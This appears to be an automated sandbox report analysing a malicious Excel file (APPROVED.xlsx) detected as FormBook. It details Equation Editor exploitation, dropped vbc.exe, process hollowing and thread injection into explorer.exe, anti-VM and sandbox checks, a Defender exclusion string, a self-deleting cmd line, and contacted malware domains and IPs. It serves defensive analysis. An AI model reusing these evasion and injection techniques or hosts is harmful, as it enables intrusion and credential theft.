          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: vbc.exe, 00000004.00000002.2151563450.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmpBinary or memory string: select EmployeeID from employeeattendance where EmployeeID=@findAUnable to delete..Already in use{select EmployeeID from employeepayment where EmployeeID=@finduselect EmployeeID from advanceentry where EmployeeID=@findwdelete from employeeregistration where EmployeeID=@DELETE1;
          Source: APPROVED.xlsxReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: APPROVED.xlsxStatic file information: File size 1101944 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdb source: vbc.exe, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, explorer.exe
          Source: Binary string: explorer.pdb source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdbh source: vbc.exe, 00000004.00000002.2151563450.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp
          Source: APPROVED.xlsxInitial sample: OLE indicators vbamacros = False
          Source: APPROVED.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0037B5E4 push ebp; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0037B5DA push ebp; retf
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B2A2 push cs; ret
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B3F2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B3FB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B3A5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B45C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00415414 push esp; ret
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00414F46 push cs; ret
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0041BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00415FC5 push ebp; ret
          Source: C:\Users\Public\vbc.exeCode function: 8_2_0093DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A2DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009B2A2 push cs; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009B3FB push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00095414 push esp; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009B45C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0009BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00094F46 push cs; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00095FC5 push ebp; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.37315390636
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: APPROVED.xlsxStream path 'EncryptedPackage' entropy: 7.99980853948 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3064, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 8_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2348Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2984Thread sleep time: -103182s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2064Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 103182
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000009.00000002.2349753135.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.2162338388.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000009.00000000.2162381993.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000009.00000000.2162175955.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000009.00000000.2154806307.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 8_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 8_2_00409B10 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 8_2_009426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_02A326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.65.7 80
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.66.247 80
          Source: C:\Windows\explorer.exeNetwork Connect: 54.85.86.211 80
          Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.161 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.essentiallyourscandles.com
          Source: C:\Windows\explorer.exeDomain query: www.brunoecatarina.com
          Source: C:\Windows\explorer.exeDomain query: www.zmzcrossrt.xyz
          Source: C:\Windows\explorer.exeDomain query: www.hfjxhs.com
          Source: C:\Windows\explorer.exeDomain query: www.cyrilgraze.com
          Source: C:\Windows\explorer.exeDomain query: www.zgcbw.net
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: DA0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmpBinary or memory string: Proxy DesktopProgmanSoftware\Microsoft\Windows\CurrentVersion\RunOnce
          Source: explorer.exe, 00000009.00000002.2349949941.00000000006F0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2350379071.0000000001080000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.2349949941.00000000006F0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2350379071.0000000001080000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000002.2349753135.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000009.00000002.2349949941.00000000006F0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2350379071.0000000001080000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 413096 Sample: APPROVED.xlsx Startdate: 13/05/2021 Architecture: WINDOWS Score: 100 51 www.myfavbutik.com 2->51 59 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 12 other signatures 2->65 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 38 23 2->15         started        signatures3 process4 dnsIp5 53 3.36.53.50, 49167, 80 AMAZONEXPANSIONGB United States 10->53 39 C:\Users\user\AppData\Local\...\xele[1].exe, PE32 10->39 dropped 41 C:\Users\Public\vbc.exe, PE32 10->41 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 vbc.exe 10->17         started        43 C:\Users\user\Desktop\~$APPROVED.xlsx, data 15->43 dropped file6 signatures7 process8 signatures9 55 Tries to detect virtualization through RDTSC time measurements 17->55 57 Injects a PE file into a foreign processes 17->57 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        25 vbc.exe 17->25         started        27 vbc.exe 17->27         started        process10 signatures11 67 Modifies the context of a thread in another process (thread injection) 20->67 69 Maps a DLL or memory area into another process 20->69 71 Sample uses process hollowing technique 20->71 73 Queues an APC in another process (thread injection) 20->73 29 explorer.exe 20->29         started        32 explorer.exe 20->32 injected process12 dnsIp13 77 Modifies the context of a thread in another process (thread injection) 29->77 79 Maps a DLL or memory area into another process 29->79 81 Tries to detect virtualization through RDTSC time measurements 